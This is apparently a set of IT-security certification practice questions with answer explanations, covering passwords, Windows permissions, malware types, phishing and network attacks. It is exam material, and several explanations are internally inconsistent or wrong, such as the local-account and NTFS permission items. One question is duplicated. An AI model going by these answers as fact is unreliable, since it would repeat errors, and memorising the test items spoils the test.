According to password best practices, the minimum length for passwords should generally be at least 8 characters, and complexity should be enforced. While it is true that a complex password (with a mix of upper and lowercase letters, numbers, and special characters) increases the security of a password, a password of only 4 characters—even if it meets complexity requirements—is still considered weak. Why the other options are correct: At least one of each of these should be used: upper- and lowercase letters, numbers, and special characters: This is a key best practice for password complexity. Requiring a mix of character types makes it significantly harder for attackers to guess or crack the password using methods like brute force or dictionary attacks. Longer passwords are better: Longer passwords provide a better security foundation, as they increase the number of possible combinations and make it much more difficult for attackers to crack through methods like brute force. Generally, the longer and more complex the password, the stronger the security. Password minimum length is eight characters: Setting a minimum length of eight characters is a standard best practice. Shorter passwords are generally easier to crack, and eight characters is considered the minimum threshold for sufficient complexity. Key Takeaway: A password that is only 4 characters long, even if it meets complexity requirements, is not secure enough. Best practices recommend a minimum of 8 characters for passwords, with added complexity to make them harder to crack.
What should you do to prevent a potential hacker from booting to a USB drive on a Windows workstation?
Require strong Windows passwords.
Change the default administrator password.
Restrict with user permissions.
Set a BIOS/UEFI password.
Setting a BIOS/UEFI password is the most effective way to prevent a potential hacker from booting a Windows workstation from a USB drive or any other external media. The BIOS/UEFI password restricts access to the system’s boot settings, preventing unauthorized users from changing the boot order (e.g., setting USB as the first boot device) and ensuring that only authorized users can boot from the internal hard drive or approved devices. Why the other options are less effective for this purpose: Require strong Windows passwords: While strong passwords are essential for protecting user accounts within the operating system, they do not prevent an attacker from altering the system’s boot order at the BIOS/UEFI level. A hacker could still boot from external media (e.g., USB) to bypass the operating system password. Change the default administrator password: Changing the default administrator password helps protect the system from unauthorized access once it’s booted into Windows, but it does not stop someone from modifying the system’s boot sequence or bypassing the OS login screen through external boot devices. Restrict with user permissions: User permissions control access to files and resources within the operating system, but they do not affect the BIOS/UEFI boot settings. An attacker with physical access to the machine can still change the boot order and potentially bypass security measures. Key Takeaway: To prevent unauthorized access via external boot devices like USB drives, you should set a BIOS/UEFI password, which ensures that only authorized users can change boot options or boot from external media.
Your company’s employees work on extremely confidential projects. Every employee has been told to lock their screens anytime they leave their computers, even for a brief period of time. What key sequence will lock their desktop right away and require a password to reenter it?
Windows Key+Right Arrow
Windows Key+D
Windows Key+X
Windows Key+L
The key sequence Windows Key + L immediately locks the desktop on Windows systems. Once the screen is locked, the user will be required to enter their password (or other authentication method) to regain access. This is a simple and effective way to protect the computer when the user steps away, ensuring that sensitive information remains secure. Why the other key sequences are incorrect: Windows Key + Right Arrow: This combination is used to snap the active window to the right side of the screen (for a split-screen view) and does not lock the computer. Windows Key + D: This minimizes all open windows and shows the desktop, but it does not lock the screen. Pressing it again restores the windows. Windows Key + X: This opens the Quick Link menu (or Power User menu) but does not lock the computer. Key Takeaway: The Windows Key + L shortcut is the quickest and most reliable way to lock the computer, requiring authentication before access is restored.
What can a system administrator do to prevent Windows users from unintentionally installing malware from USB thumb drives and DVD-ROMs that contain malicious code?
Disable AutoRun and AutoPlay.
Enable BIOS/UEFI passwords.
Enable data encryption.
Set restrictive user permissions.
Disabling AutoRun and AutoPlay is one of the most effective measures to prevent Windows users from unintentionally installing malware from USB thumb drives and DVD-ROMs that may contain malicious code. AutoRun and AutoPlay are features in Windows that automatically execute programs or open files when a USB device, CD/DVD, or other media is inserted into the computer. These features can be exploited by malware, which may automatically run upon insertion, thereby infecting the system without any user interaction. By disabling these features, the system will not automatically execute anything from a USB drive or DVD-ROM, and the user will need to manually initiate any programs or files they choose to open, thereby preventing automatic execution of malicious code. Why the other options are less effective for this purpose: Enable BIOS/UEFI passwords: While setting a BIOS/UEFI password can prevent unauthorized users from booting the system or changing critical system settings (such as boot order), it doesn’t address the specific issue of malware installation from external drives like USB thumb drives and DVDs. Enable data encryption: Data encryption helps protect data from unauthorized access, but it doesn’t prevent malware from executing. Encrypted files would still be accessible to malicious software if the user runs an infected program. Set restrictive user permissions: Setting restrictive user permissions can limit the ability of users to install software or modify system settings. However, this approach is less effective at preventing the automatic execution of malware from external media, which can happen even under restricted user permissions. Disabling AutoRun and AutoPlay specifically targets the method malware often uses to spread through USB or DVD media. Key Takeaway: Disabling AutoRun and AutoPlay prevents malicious software from automatically executing when external devices are connected to the system, significantly reducing the risk of malware infections from USB drives and DVDs.
Which user account should you disable on a Windows 11 Pro workstation for better security?
Administrator
Default Account
Power User
Guest
The Guest account on a Windows 11 Pro workstation is meant to provide temporary access for users who don’t have their own account. However, it poses a security risk because it often has minimal restrictions and can be easily exploited by malicious actors. Disabling the Guest account improves security by preventing unauthorized users from accessing the system with a default, low-privileged account. In most environments, guest access isn’t necessary and is better turned off. Why the other accounts are less critical to disable: Administrator: The Administrator account is a highly privileged account and should only be used when necessary. However, it is typically disabled by default on Windows 11. If it’s enabled, it should be protected with strong passwords, but it’s not the first account to disable for security purposes. DefaultAccount: The DefaultAccount is a system account used by Windows for internal operations, and it’s not meant for user login. It’s disabled by default, so there’s no need to worry about it being used unless it’s explicitly activated, which would be rare. Power User: Power User is a legacy account type that is not commonly used in modern Windows operating systems. This account has more permissions than a standard user but less than an administrator. It’s generally not enabled by default, and if it is, it should be handled carefully. However, it does not pose the same immediate risk as the Guest account. Key Takeaway: Disabling the Guest account is the most effective way to increase security because it prevents unauthorized access using a default account with potentially low-level privileges.
When a user is conducting online research, too many advertisements keep appearing on his screen, making it impossible for him to complete his task. To address this issue, what can you configure in his browser?
Pop-up blocker
Certificate
Private-browsing mode
Password manager
A pop-up blocker is a feature that can be enabled in most modern web browsers to prevent unwanted pop-up windows, often used for advertisements, from appearing while browsing. Pop-up blockers are specifically designed to stop intrusive advertisements from interrupting the user’s experience. By configuring this in the browser, you can help reduce the number of pop-ups that appear during online research. Why the other options are incorrect: Certificate: A certificate is used for securing connections between websites and browsers (e.g., SSL/TLS certificates for HTTPS). It does not prevent advertisements from appearing. Private-browsing mode: This mode, also known as Incognito or InPrivate browsing, prevents the browser from saving browsing history, cookies, or site data. While it can improve privacy, it does not block advertisements or pop-ups. Password manager: A password manager helps store and manage user credentials for websites securely. It has no role in blocking pop-ups or advertisements. Conclusion: To solve the issue of too many advertisements, you should configure the browser’s pop-up blocker to prevent these unwanted ads from interrupting the user’s tasks.
You’re configuring password requirements, including the length and expiration, for multiple Windows 11 Pro workstations. What utility on the workstation can you use to do this?
Administrative Tools
Local Security Policy
Users Accounts in Control Panel.
Local Users and Groups.
To configure password requirements, such as length, complexity, and expiration, on a Windows 11 Pro workstation, you would use the Local Security Policy utility. This tool allows you to set various security policies on a local computer, including password policies. Here’s how you can configure password requirements using Local Security Policy: Press Win + R, type secpol.msc, and press Enter. In the Local Security Policy window, navigate to Account Policies > Password Policy. From there, you can configure options like: Minimum password length Password complexity requirements Maximum password age (expiration) Minimum password age, etc. Why the other options are incorrect: Administrative Tools: While Administrative Tools contains several useful utilities, the Local Security Policy is the specific tool for managing password policies, not the general Administrative Tools menu. User Accounts in Control Panel: This utility is used for managing user accounts (such as creating, deleting, or modifying user accounts) but does not allow you to configure advanced password policies like length and expiration. Local Users and Groups: This utility is used to manage local user accounts and groups, but it does not allow you to set password policies. It’s focused on account and group management. Summary: To configure password policies (including length, expiration, etc.) on a Windows 11 Pro workstation, the correct tool to use is Local Security Policy.
You want to establish a new policy that uses BitLocker to encrypt all company drives. Which operating system needs updating?
Windows 11 Home
Windows 11 Pro
Windows 10 for Workstations.
Windows 10 Pro
BitLocker is a full-disk encryption tool that is available in certain editions of Windows, but not all. Here’s how it breaks down for the listed operating systems: Windows 11 Home: BitLocker is not available in Windows 11 Home. Users must upgrade to Windows 11 Pro or another compatible edition to use BitLocker for full disk encryption. Windows 11 Pro: BitLocker is available in Windows 11 Pro, so no update is necessary here. It can be used to encrypt drives. Windows 10 for Workstations: This edition includes BitLocker as well, so it does not need updating either. It supports full disk encryption, just like Windows 10 Pro. Windows 10 Pro: BitLocker is available in Windows 10 Pro, so no update is necessary here either. Summary: If you need BitLocker for encryption, the system must be running Windows 11 Pro or Windows 10 Pro at the very least. Windows 11 Home will need an upgrade to Windows 11 Pro to access BitLocker.
What is TRUE about NTFS and share permissions on a Windows 11 workstation?
NTFS permissions can be applied at the file or folder level, and share permissions can only be applied at the folder level.
Both NTFS and share permissions can be applied only at the folder level.
NTFS permissions can be applied only at the folder level, but share permissions can be applied to files and folders.
Both NTFS and share permissions support inheritance.
NTFS permissions: These can be applied at both the file and folder levels on an NTFS-formatted volume. This means you can set different permissions for individual files within a folder, giving you fine-grained control over access. Share permissions: These only apply at the folder level. When a folder is shared over the network, share permissions are set to control access to that entire folder. Share permissions do not apply to individual files within the shared folder. Why the other options are incorrect: “Both NTFS and share permissions can be applied only at the folder level”: This is incorrect because NTFS permissions can also be applied at the file level, not just the folder level. “NTFS permissions can be applied only at the folder level, but share permissions can be applied to files and folders”: This is incorrect because share permissions apply only to folders, not to individual files. “Both NTFS and share permissions support inheritance”: While NTFS permissions support inheritance, share permissions do not support inheritance. Share permissions must be set manually for each shared folder, and they do not propagate down to subfolders or files. Key Takeaway: NTFS provides more granular control by allowing permissions on both files and folders. Share permissions only apply to folders that are shared over the network.
What is NOT a way to know the date and time when a file is changed?
Open the folder in File Explorer and click Date Modified to sort the files by the date they were last modified.
Type archive at a command prompt.
Right-click each file and choose Properties, and then Advanced to see whether the archive bit is set.
Type attrib at a command prompt.
The term “archive” is not a valid command in the context of determining the date and time a file was changed. The archive bit (a file attribute) indicates whether a file has been modified since the last backup, but typing “archive” by itself at a command prompt will not provide any useful information. Here’s why the other options are correct methods for checking the date and time when a file is changed: Open the folder in File Explorer and click Date Modified to sort the files by the date they were last modified: This is a straightforward method to see when files were last changed. By sorting files by “Date Modified,” you can easily determine the last modification time for each file. Right-click each file and choose Properties, and then Advanced to see whether the archive bit is set: The archive bit is used to track whether a file has been modified since the last backup. While it does not directly show the date and time of modification, it indicates that a file has been altered since it was last backed up. Type attrib at a command prompt: The attrib command shows file attributes, including the archive bit. You can use this to see if the archive bit has been set, which typically indicates that the file has been modified. Summary: The “archive” command by itself doesn’t give any useful information about file modification, while the other options help provide timestamps or related details.
How can a computer user set up a new Windows 11 Home computer with a local account?
Local accounts are never available in Windows 11.
Press F10 during bootup to create a local account.
They must switch to the Pro edition if they want to use a local account after setup.
That option is not available. They must use a Microsoft account.
In Windows 11 Home, Microsoft has removed the option to set up a local account directly during the initial setup process. Users are required to sign in with a Microsoft account. Here’s the process for setting up a new Windows 11 Home computer: During the setup, you must provide a Microsoft account (email and password) to proceed. If you don’t want to use a Microsoft account, you can temporarily disconnect from the internet during the setup (e.g., by turning off Wi-Fi or unplugging Ethernet), which will force Windows to allow the creation of a local account instead. However, in Windows 11 Home, creating a local account is not the default option during the initial setup, unlike in the Pro or Enterprise editions, where it is possible to choose between a local or Microsoft account during the setup. Why the other options are incorrect: “Local accounts are never available in Windows 11”: This is not true, as local accounts are available, but their setup process is restricted in Windows 11 Home. “Press F10 during bootup to create a local account”: This is not a valid method for creating a local account on Windows 11 Home. “They must switch to the Pro edition if they want to use a local account after setup”: This is incorrect. While Windows 11 Pro allows more flexibility with account setup, the option for a local account is still available in Windows 11 Pro without needing to switch.
What is TRUE about the network access of a new user that has joined your company as a network administrator?
They should have just one user account, with administrator-level permissions.
They should have two user accounts: one with user-level permissions and one with administrator-level permissions.
They should have just one user account, with standard user-level permissions.
They should have three user accounts: one with user-level permissions, one with administrator level permissions, and one with remote access administrator permissions.
When it comes to network administrators, security best practices dictate the use of separation of duties for different levels of access: User-level account: This account should be used for day-to-day activities such as checking emails, browsing the internet, and other standard tasks. The goal is to reduce the risk of accidental or malicious damage to the network when performing non-administrative tasks. Administrator-level account: This account should be used only for tasks that require elevated privileges, such as configuring servers, managing network security, or performing system maintenance. By using a separate account for administrative tasks, the risk of performing a high-privilege task by accident (such as downloading malware or executing a malicious script) is minimized. This approach ensures that: The administrator can work in a least-privilege environment most of the time. They can switch to the administrator account only when elevated access is needed. Why the other options are incorrect: One account with administrator-level permissions: This would pose a security risk, as the administrator would always be operating with elevated privileges, increasing the chances of accidental system misconfigurations or security breaches. One account with standard user-level permissions: This would restrict the network administrator from performing their administrative duties, limiting their ability to manage the network. Three accounts: This is excessive and complicates access control management. In most cases, two accounts (one with user-level permissions and one with administrator-level permissions) are sufficient.
A user on your network is trying to open a folder named Projects on a local NTFS volume. Their user account is in the Developers group, which has Read & Execute permissions on the folder. The user’s user account has Full Control permissions on the folder. What are the user’s effective permissions on the folder?
No access
Read & Execute
Full control
Read
When determining the effective permissions a user has on a resource, both the permissions assigned to the user account and the permissions assigned to the groups the user belongs to are considered. However, the most restrictive permission (the lowest permission level) is not always what applies. In your scenario: The user’s account has Full Control permissions on the folder. The user is also part of the Developers group, which has Read & Execute permissions on the folder. Since Full Control is more permissive than Read & Execute, the user’s effective permissions will be determined by the highest permission level, which is Full Control. This means the user can read, modify, and execute files, and can also change the permissions on the folder if needed. Key Takeaway: In NTFS, if a user has different permissions from a group they belong to, the most permissive set of permissions takes effect. So, Full Control (from the user’s individual permissions) overrides Read & Execute (from the group).
Users need to be able to access a variety of systems on your network, including a Windows domain, a cloud storage site, and order processing software. You should set up the network so that users’ login credentials are valid for several systems, eliminating the need for them to remember different usernames and passwords for each site. Which technology should you use?
UAC
SSO
EFS
MDM
Single Sign-On (SSO) is a technology that allows users to log in once and gain access to multiple systems or applications without needing to re-enter their credentials for each one. In your scenario: Users need to access multiple systems (Windows domain, cloud storage, and order processing software). SSO enables users to authenticate once and access all the required systems without remembering different usernames and passwords for each. Why the other options are incorrect: UAC (User Account Control): A security feature in Windows that helps prevent unauthorized changes to the system. It does not manage user authentication across multiple systems. EFS (Encrypting File System): A Windows feature for encrypting files on a local disk, unrelated to managing multiple system logins. MDM (Mobile Device Management): A system for managing mobile devices, like smartphones and tablets, including app distribution and security policies, but not directly related to handling user credentials for different systems. SSO streamlines access and improves security by reducing the number of passwords users need to remember.
You are configuring a wireless network for a small office. According to a good rule of thumb, what should you do when considering access point placement?
Place them in walls or ceilings for protection.
Place them near metal objects so the signal will reflect better.
Place them in the center of the network area.
Place them at the edge of the network area and focus them in the proper direction.
When configuring a wireless network, the general rule of thumb for access point (AP) placement is to place them in the center of the network area. This ensures that the wireless signal is evenly distributed throughout the coverage area, providing optimal connectivity for all users. Central placement helps minimize dead spots and ensures that the signal strength is distributed uniformly, offering better coverage for devices connected to the network. It also ensures that users, regardless of their location within the office, will experience a strong and consistent connection, which is essential for network reliability and performance. Why the other options are incorrect: Place them in walls or ceilings for protection: While placing access points on walls or ceilings might improve coverage in some environments, protection from damage isn’t the primary consideration when placing APs. Access points need to be placed for optimal signal coverage rather than just protection. Also, placing them inside walls can sometimes limit signal strength. Place them near metal objects so the signal will reflect better: Metal objects can interfere with wireless signals, not enhance them. Wireless signals reflect unpredictably off metal surfaces and can cause signal degradation or interference, which will actually reduce the quality of your network. Place them at the edge of the network area and focus them in the proper direction: Placing access points at the edges of the coverage area typically leads to uneven coverage, with some areas having weak signals. It’s best to place APs centrally, unless there’s a specific reason to focus the signal in a particular direction (such as directional antennas). Conclusion: To maximize coverage and ensure the best possible network performance, placing your access points in the center of the network area ensures optimal coverage and reduces the risk of weak spots in your wireless network.
Your web server just crashed as a result of a flood of responses to a packet that looks like it came from your server but was actually sent by another. What type of attack is this?
Evil twin attack
Distributed DoS attack
Whaling attack
Denial-of-service attack
This scenario describes a Denial-of-Service (DoS) attack, specifically a reflection or amplification attack, where: An attacker spoofs your server’s IP address in requests sent to third-party servers. Those servers then send a flood of responses back to your server, thinking your server made the requests. This overwhelms your server, causing it to crash. This type of DoS attack doesn’t necessarily require a botnet (which would make it a Distributed DoS, or DDoS). The key here is the flood of responses to a spoofed packet, leading to service disruption. Why the other options are incorrect: Evil twin attack: Involves rogue Wi-Fi access points, not web server flooding. Distributed DoS attack: Could be correct if multiple systems were involved, but the question doesn’t specify that. Whaling attack: A phishing attack targeting executives—completely unrelated to server attacks.
To save money on hardware, your company allows employees to use their personal devices for work-related purposes. What is this called?
SSO
BYOD
UAC
MDM
BYOD stands for Bring Your Own Device, a policy that allows employees to use their personal devices (like smartphones, tablets, or laptops) for work-related tasks. It’s often adopted to reduce hardware costs and increase flexibility. In your scenario: Employees are using their own devices to do company work. This is a classic example of a BYOD policy. Why the other options are incorrect: SSO (Single Sign-On): A login method that lets users access multiple systems with one set of credentials. UAC (User Account Control): A Windows security feature that prevents unauthorized system changes. MDM (Mobile Device Management): A tool used to manage and secure mobile devices, often used with BYOD, but not the term for the policy itself.
While looking through the Event Viewer logs, you see numerous attempts to access the corporate bank account information have failed. The attempts are being made by an employee who was hired just one month ago. What type of attack is this?
Social engineering
Insider threat
Whaling
Eval twin
An insider threat involves someone within the organization, such as an employee, contractor, or business partner, who poses a security risk. This can be due to malicious intent or negligence. In this case: The attacker is an employee. They’re attempting to access sensitive financial information (corporate bank accounts). These unauthorized access attempts suggest malicious intent or curiosity. This behavior fits the definition of an insider threat. Why the other options are incorrect: Social engineering: Involves tricking someone into giving up information—usually external and psychological. Whaling: A phishing attack targeting high-level executives—not the case here. Evil twin: A fake Wi-Fi access point used for intercepting data—not related to internal logins.
Which are the types of security threats that directly attack user passwords?
Zombie/botnet
Dictionary attack
Spoofing
Brute-force
Both dictionary attacks and brute-force attacks are direct methods used by attackers to crack or guess user passwords: Dictionary attack: Uses a predefined list of likely passwords (like words from a dictionary or common passwords). Fast and efficient for weak passwords. Targets user behavior (e.g., using “password123”). Brute-force attack: Systematically tries every possible combination of characters until the correct password is found. Slower but more thorough. Can crack stronger passwords given enough time and computing power. Why the other options are incorrect: Zombie/botnet: A group of infected devices used to launch attacks (like DDoS), not specifically for password cracking. Spoofing: Impersonating a trusted source to deceive users—not directly used to guess or crack passwords.
You are educating users of mobile devices about possible security risks. What might put users at greater risk for an on-path attack?
Unintended Wi-Fi connection.
Unauthorized account access.
Unauthorized camera activation.
Unauthorized location tracking.
An on-path attack (also known as a man-in-the-middle (MITM) attack) occurs when an attacker secretly intercepts and possibly alters the communication between two parties who believe they are directly communicating with each other. Unintended Wi-Fi connections, especially to unsecured or rogue networks (like fake public Wi-Fi hotspots), increase the risk of on-path attacks because: Attackers can set up a fake Wi-Fi access point. When a user connects without realizing, the attacker can intercept data like login credentials, emails, or financial info. Why the other options are incorrect: Unauthorized account access: The result of an attack, not a cause or risk factor for an on-path attack. Unauthorized camera activation: A privacy concern, often from spyware, but not related to network interception. Unauthorized location tracking: Also a privacy concern, but not relevant to on-path attacks.
Your server has crashed as a result of a botnet attack on the website of your company. What kind of attack was brought on by the botnet attack?
Zero-day
Non-compliant system
Distributed denial of service
Bruite-force
A Distributed Denial of Service (DDoS) attack happens when a botnet—a network of infected computers—floods a server or website with an overwhelming amount of traffic. The goal is to exhaust system resources, causing the server to crash or become unavailable to legitimate users. In your scenario: The server crashed. The crash was due to a botnet attack. This aligns exactly with the nature of a DDoS attack. Why the other options are incorrect: Zero-day: Exploits unknown software vulnerabilities; not directly tied to botnets or traffic overload. Non-compliant system: Refers to systems that don’t meet security standards—not an attack type. Brute-force: Attempts to guess credentials repeatedly—not related to crashing servers with traffic.
What kind of attack is similar to a SQL injection, but instead of using a database, uses a website and HTML or JavaScript where malicious code is injected into the website, which the user typically trusts, and is then used to gather information from the user’s computer because their systems don’t perceive the normally trusted website as a threat.
Zero-day attack
Cross-site scripting
SQL injection
Unprotected system
Cross-site scripting (XSS) is a type of attack where malicious code (usually JavaScript) is injected into a trusted website. When users visit the compromised site, their browsers run the malicious script, thinking it’s from a trusted source. This can lead to stolen cookies, session tokens, or other sensitive information. Here’s how it matches the scenario: The attack targets a website, not a database (unlike SQL injection). It uses HTML or JavaScript. The code is injected into a trusted site, making the user’s system not recognize it as a threat. It gathers information from users, often without their knowledge. Why the other options are incorrect: Zero-day attack: Exploits unknown vulnerabilities—not necessarily related to code injection. SQL injection: Targets databases through SQL queries, not browsers or users. Unprotected system: A vague term—not a specific type of attack.
The vice president your company got an email from you asking for his username and password. The vice president remained silent because he believed you already knew them. What kind of attack is this?
Evil twin
Phishing
Whailing
Vishing
Whaling is a type of phishing attack that specifically targets high-profile individuals like executives, CEOs, or in this case, a vice president. The goal is usually to trick them into revealing sensitive information or credentials. In this scenario: The attacker pretends to be you (a trusted colleague) and emails the vice president. The email asks for his username and password. The VP assumes it’s legitimate due to your perceived authority or familiarity and does not question it. This is a whaling attack because: It’s a social engineering tactic. The target is a high-ranking executive. It uses email, which is common in phishing-based attacks. Here’s how the other options don’t fit: Evil twin: Involves a fake Wi-Fi access point to steal data. Phishing: General term for tricking people into giving up data—whaling is a subtype. Vishing: Voice phishing—done over the phone, not email.
The vice president your company got an email from you asking for his username and password. The vice president remained silent because he believed you already knew them. What kind of attack is this?
Phishing
Whailing
Vishing
Evil twin
Whaling is a specific type of phishing attack that targets high-ranking executives or key individuals in an organization, such as the vice president. In this case, the attacker impersonates a trusted individual (you, in this scenario) and requests sensitive information like username and password. Whaling is often more personalized and convincing than general phishing because the attacker has researched the target and can craft emails that seem legitimate, making the target more likely to respond. Since the vice president thought you already knew the information, they were more vulnerable to the attack. Why the other options are incorrect: Phishing: A general term for any email or message that tries to deceive the recipient into providing personal information. While whaling is a form of phishing, phishing attacks typically target a broader audience, not just high-level executives. Vishing: Refers to phishing that occurs over the phone (voice phishing). In this case, the attack was done via email. Evil twin: Refers to a type of attack where a malicious Wi-Fi network is set up to mimic a legitimate one, tricking users into connecting to it. This is unrelated to the email-based attack described here. Whaling is particularly dangerous because high-level targets may have access to sensitive company information, and a successful attack can have severe consequences.
You are configuring a router for a small office network. Users of the network ought to have access to regular, secure websites and be able to send and receive email. Those are the only connections allowed to the Internet. Which security feature should you set up to stop additional traffic from passing through the router?
Port forwarding/mapping.
MAC filtering.
Content filtering.
Port security/disabling unused ports.
To ensure that users in your small office network can only access secure websites (typically on port 443 for HTTPS) and send/receive emails (typically on ports 25, 465, or 587 for SMTP and 993 for IMAPS), you should set up port security by disabling unused ports on the router. This limits the flow of traffic to only the necessary ports for those specific services. Port security involves restricting which ports on the router or switch can be accessed by devices on the network. By closing unused ports (for example, blocking ports for file sharing, FTP, or other services not needed), you can prevent any unauthorized traffic from entering or leaving the network. Disabling unused ports means that any unnecessary communication channels are closed, so the router will only allow the specific types of traffic you have configured. Why the other options are incorrect: Port forwarding/mapping: This feature allows traffic from specific ports (typically from the outside world) to be forwarded to an internal device. It’s used when you want to expose certain services (e.g., a web server) to the internet. This isn’t about restricting unwanted traffic, but rather about opening specific ports for legitimate purposes. MAC filtering: While MAC filtering can control which devices can connect to the network based on their MAC address, it doesn’t stop traffic from certain ports or protocols. It’s mainly used for access control, not traffic control. Content filtering: Content filtering controls what users can access based on the content, such as blocking specific websites or categories. While helpful for preventing access to inappropriate content, it doesn’t directly control which ports or protocols can be used to access the internet. Conclusion: Setting up port security and disabling unused ports is the best way to ensure that only the necessary types of traffic (e.g., secure websites and email) are allowed to pass through the router, effectively securing the network by blocking other types of traffic.
Your antivirus software is outdated, and several workstations on your network haven’t had their operating systems updated in over a year. Which kind of security risk does this pose?
Zero-day attack.
Zombie/botnet.
Brute-force attack.
Non-compliant systems.
In the context of security and IT governance, non-compliant systems refer to systems that do not meet established security standards, regulations, or best practices. If your antivirus software is outdated and the operating systems on several workstations haven’t been updated in over a year, those systems are not compliant with modern security requirements. Non-compliance can occur due to: Failure to apply critical security patches: Systems with outdated OS or antivirus software are vulnerable to attacks, which goes against compliance requirements. Lack of protection against current threats: Without up-to-date antivirus software, the systems cannot effectively detect or protect against new malware, which is a violation of security standards. Regulatory or industry requirements: Many industries, like finance and healthcare, have specific security regulations that require up-to-date software and antivirus protection. Failing to maintain these standards can lead to compliance issues. In many cases, compliance frameworks (like GDPR, HIPAA, PCI-DSS) require that systems have the latest updates installed to reduce vulnerabilities and risks. If your systems aren’t updated, they’re not compliant with these frameworks, which could result in legal, financial, or reputational consequences. Why the other options are incorrect: Zero-day attack: While outdated systems could increase the risk of a zero-day attack, the primary concern in this case is the lack of compliance rather than the specific type of attack. Zombie/botnet: This is when compromised devices are used for malicious activities, such as DDoS attacks, but it’s not directly about compliance. Brute-force attack: A brute-force attack attempts to guess passwords, but this isn’t specifically linked to outdated antivirus or OS updates. Non-compliance refers more to not meeting security or regulatory standards, not just attack types. In summary, when your systems are outdated and lack proper security software, they become non-compliant with security policies and regulations, which can open the door to various other risks.
What risk is there when an operating system that has reached EOL is used?
Lack of security updates.
Lack of feature updates.
There is no technical support.
Technical support is very expensive.
When an operating system (OS) reaches its End of Life (EOL), the software vendor stops providing security updates and patches for that version of the OS. This poses a significant security risk, as any new vulnerabilities discovered after the EOL date will remain unpatched, making the system highly susceptible to exploitation by attackers. Key risks include: Exposed vulnerabilities: Without security patches, any weaknesses in the OS can be exploited by malware or hackers. Compliance issues: Certain industries require systems to be kept up to date with security patches to meet compliance standards. Why the other options are incorrect: Lack of feature updates: While this is true, it’s less critical than security updates in the context of risk. Lack of new features doesn’t usually expose the system to security vulnerabilities. There is no technical support: While technical support is unavailable, the primary concern with using an EOL OS is the lack of security updates rather than the absence of support. Technical support is very expensive: This may be true, but the real risk is the exposure to security threats without updates, not just the cost of support. Using an OS that has reached EOL is risky because it exposes the system to potential attacks. It is crucial to upgrade or switch to a supported OS to ensure continuous security protection.
A network user claimed that a message appeared and his screen turned blank. The message tells him that his files are no longer accessible and he must enter his credit card number and pay $200 to get them back. What type of malware is this?
Spyware
Ransomware
Rootkit
Trojan
Ransomware is a type of malware that encrypts a user’s files or locks them out of their system, demanding a ransom payment (in this case, $200) in exchange for regaining access to the files. The key characteristics of ransomware are: The user is locked out of their files (often with a blank screen or message). A demand for payment is made (often involving cryptocurrency or credit card details). The attacker promises to restore access to the files once the ransom is paid, though this is often a scam. Ransomware can be devastating, as it renders critical files or systems inaccessible and demands payment to decrypt or unlock them. Why the other options are incorrect: Spyware: This malware silently monitors user activities, such as keystrokes, but does not lock or demand money for files. Rootkit: A rootkit hides its presence in the system to maintain privileged access, but it doesn’t typically lock files or demand ransom. Trojan: A Trojan horse disguises itself as legitimate software, but it doesn’t typically lock files or ask for ransom. It may, however, be used to install ransomware. Ransomware is increasingly common, and it’s important to maintain regular backups and use security software to prevent such attacks.
What kind of malware poses a risk to the system because it loads during startup before the antivirus software can?
Ransomware
Boot sector virus
Spyware
Keylogger
A boot sector virus is a type of malware that infects the boot sector of a computer’s hard drive or storage device. The boot sector is responsible for loading the operating system when the system starts up. This type of virus is particularly dangerous because it loads before the operating system and before antivirus software can run, making it harder for security software to detect or stop the infection. Because the boot sector virus activates early in the boot process, it can take control of the system before any protective measures are in place, potentially allowing it to evade detection by antivirus software. Why the other options are incorrect: Ransomware: This is a type of malware that encrypts the user’s files and demands payment for decryption. While it can cause significant damage, it typically doesn’t load before antivirus software during startup. Spyware: Spyware monitors user activity, such as keystrokes, but doesn’t typically infect the system at the boot level, so it’s not as stealthy as a boot sector virus. Keylogger: A keylogger records keystrokes but is usually installed after the system is running and doesn’t need to load before antivirus protection like a boot sector virus does.
What security measure would prevent unauthorized network traffic from probing a user’s workstation?
Anti-malware
Antivirus
Software firewall
Anti-phishing training
A software firewall acts as a barrier between a user’s workstation and the network, controlling the incoming and outgoing traffic based on predetermined security rules. It helps prevent unauthorized network traffic from probing or accessing the workstation by blocking suspicious or unauthorized requests. The firewall can filter traffic, allowing only trusted connections and preventing malicious network probes or attempts to exploit vulnerabilities on the system. Why the other options are incorrect: Anti-malware: Helps detect and remove malware on a system but does not directly block unauthorized network traffic. Antivirus: Primarily focuses on detecting and removing viruses, not specifically on controlling network traffic. Antiphishing training: Educates users on how to avoid phishing attacks but does not address unauthorized network probing. A software firewall provides an essential layer of defense, particularly when connected to public or untrusted networks, by preventing unauthorized access attempts.
A laptop user has no idea about software installed on it. The software has been tracking the user’s keystrokes and has transmitted them to an attacker. What kind of threat is this?
Spoofing
Zombie/Botnet
Spyware
Ransomware
Spyware is a type of malicious software designed to secretly monitor and collect data from a user’s system, often without their knowledge or consent. In this case, the software is tracking keystrokes and sending them to an attacker, which is a typical characteristic of a keylogger, a type of spyware. Spyware can: Capture keystrokes (keylogging) Monitor browsing activity Gather sensitive data (e.g., passwords, credit card info) Transmit this data to cybercriminals Why the others are incorrect: Spoofing: Involves pretending to be someone or something else to gain unauthorized access, but not tracking or stealing data. Zombie/botnet: Refers to a collection of infected devices controlled by an attacker for malicious purposes, often used for DDoS attacks, but not for tracking keystrokes. Ransomware: Encrypts the user’s files and demands payment for decryption, not related to tracking activity or keylogging.
The Windows computer of a user completely locked up. A notification stating that the person pictured had engaged in criminal activity was displayed on the screen. The webcam automatically turned on, and the computer user was pictured. Additionally, it stated that the user could settle the allegations against him/her with a $500 fine. The user was understandably shaken by the incident. What would be the BEST course of action in this situation?
Tell the user that if they performed an illegal activity with their work computer, their employment will be terminated.
Delete and reinstall Windows.
Boot to a bootable media from your anti-malware provider and run a remediation.
Pay the fine
This situation is a classic example of scareware or ransomware, often referred to as “police ransomware” or “locker ransomware”. It locks the system, shows an intimidating message, and demands payment, typically under the pretense of law enforcement action. The best course of action is to: Avoid paying the fine, as it’s a scam and won’t fix the issue. Do not delete and reinstall Windows immediately, as this could lead to data loss. Use a bootable antivirus rescue disk (from a trusted provider like Kaspersky, Bitdefender, etc.) to boot the system externally, bypassing the infected OS, and run a deep scan and removal process. This method allows you to remove the malware safely without risking files or further compromising the system. Why the others are wrong: Telling the user about termination adds fear and doesn’t help resolve the incident. Reinstalling Windows can remove the malware but should be a last resort due to data loss risk. Paying the fine encourages cybercriminals and doesn’t guarantee system access restoration.
At the root of user directory, a user finds a strange text file. Everything the user has typed in the last few days, including his credentials, is there. Why does this text file exist?
Email application in debug mode.
System auditing enabled
Backup file
Keylogger installed
